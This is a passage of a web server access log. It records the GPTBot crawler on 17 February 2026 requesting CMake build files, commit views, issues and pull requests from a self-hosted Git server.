192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:18:03:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11160] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:18:03:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11184] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:18:03:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11061] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:18:03:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 10128] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:18:03:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10127] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?project=-1&state=all&type=all" -[17/Feb/2026:18:03:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11037] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:18:03:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11066] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:18:03:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11066] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:18:03:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11066] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:18:03:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11003] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:18:03:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10172] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&state=open&type=all" -[17/Feb/2026:18:03:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10159] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?project=-1&state=open&type=all" -[17/Feb/2026:18:03:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 9965] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&state=open&type=all" -[17/Feb/2026:18:03:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 9947] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&state=all&type=all" -[17/Feb/2026:18:03:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10170] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&state=open&type=all" -[17/Feb/2026:18:03:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&project=-1&state=all&type=all" -[17/Feb/2026:18:03:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&project=-1&state=all&type=all" -[17/Feb/2026:18:03:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9987] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:18:03:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10152] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:03:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10165] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&state=all&type=all" -[17/Feb/2026:18:03:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9986] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:18:03:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10149] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&state=all&type=all" -[17/Feb/2026:18:03:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977?files=C%2b%2bProject%2findustrial-comm%2fcpp%2fsrc" [Client 74.7.227.38] [Length 61096] [Gzip 12.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src" -[17/Feb/2026:18:03:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fcpp%2fsrc" [Client 74.7.227.38] [Length 31473] [Gzip 6.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src" -[17/Feb/2026:18:03:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2f.cmake" [Client 74.7.227.38] [Length 62199] [Gzip 14.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake" -[17/Feb/2026:18:03:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=rendered" [Client 74.7.227.38] [Length 11085] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:18:03:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=rendered" [Client 74.7.227.38] [Length 11085] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:18:03:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin?display=rendered" [Client 74.7.227.38] [Length 11053] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:18:03:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11124] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:18:03:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=rendered" [Client 74.7.227.38] [Length 11084] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:18:03:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake?display=source" [Client 74.7.227.38] [Length 13705] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:18:03:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make?display=rendered" [Client 74.7.227.38] [Length 11084] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:18:03:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make?display=source" [Client 74.7.227.38] [Length 11232] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:18:03:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake?display=source" [Client 74.7.227.38] [Length 13732] [Gzip 4.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:18:03:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake?display=source" [Client 74.7.227.38] [Length 13729] [Gzip 4.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:18:03:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11092] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:18:03:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=source" [Client 74.7.227.38] [Length 11504] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:18:03:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake?display=source" [Client 74.7.227.38] [Length 13730] [Gzip 4.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:18:03:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11184] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:18:03:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15123] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:03:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15099] [Gzip 5.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:03:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11187] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:18:03:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11093] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:03:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=source" [Client 74.7.227.38] [Length 11201] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:18:03:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=source" [Client 74.7.227.38] [Length 11506] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:18:03:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11095] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:03:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=rendered" [Client 74.7.227.38] [Length 11083] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:18:03:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin?display=rendered" [Client 74.7.227.38] [Length 11052] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:18:03:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11124] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:18:03:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11096] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; 